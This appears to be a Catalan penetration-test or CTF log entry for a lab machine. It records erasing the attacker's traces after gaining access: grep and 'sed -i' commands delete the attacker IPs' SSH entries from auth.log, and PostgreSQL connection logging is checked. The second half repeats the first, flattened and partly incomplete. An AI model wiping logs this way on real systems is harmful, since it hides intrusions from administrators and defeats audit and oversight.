Persona --> Cristian
Temps --> 02/03/2023 18:00 - 20:00h
Acció --> Connectar com a root al servidor i eliminar el nostre rastre
Endpoint --> 10.10.11.195
Resultat --> Hem aconseguit esborrar el nostre rastre de forma satisfactòria.
Output:
En aquest apartat esborrem el nostre rastre a la màquina atacada per tal que no es detecti que hem aconseguit accés.
1-Esborrar el rastre d'accés per SSH amb l'usuari Bill
bill@broscience $ cat auth.log | grep 10.10.14.74
Feb 28 20:23:23 broscience sshd[24828]: Accepted password for bill from 10.10.14.74 port 43164 ssh2
bill@broscience $ sed -i '/10.10.14.74/d' auth.log
bill@broscience $ cat auth.log | grep 10.10.14.74
bill@broscience $
bill@broscience $ sed -i '/10.10.14.123/d' auth.log
bill@broscience $ cat auth.log | grep 10.10.14.123
bill@broscience $
2-Esborrar les consultes realitzades a la web des de les nostres IPs
bill@broscience $ cat postgresql.conf | grep log_connections
# "postgres -c log_connections=on". Some parameters can be changed at run time
#log_connections = off
bill@broscience $
Com podem veure no està activada la directiva per guardar els accessos (log_connections) en els logs.
Persona --> Cristian Temps --> 02/03/2023 18:00 - 20:00h Acció --> Connectar com a root al servidor i eliminar el nostre rastre Endpoint --> 10.10.11.195 Resultat --> Hem aconseguit esborrar el nostre rastre de forma satisfactòria. Output:
En aquest apartat esborrem el nostre rastre a la màquina atacada per tal que no es detecti que hem aconseguit accés.
1-Esborrar el rastre d'accés per SSH amb l'usuari Bill
2-Esborrar les consultes realitzades a la web des de les nostres IPs
3-Esborrar l'accés a la base de dades
Com podem veure no està activada la directiva per guardar els accessos (log_connections) en els logs.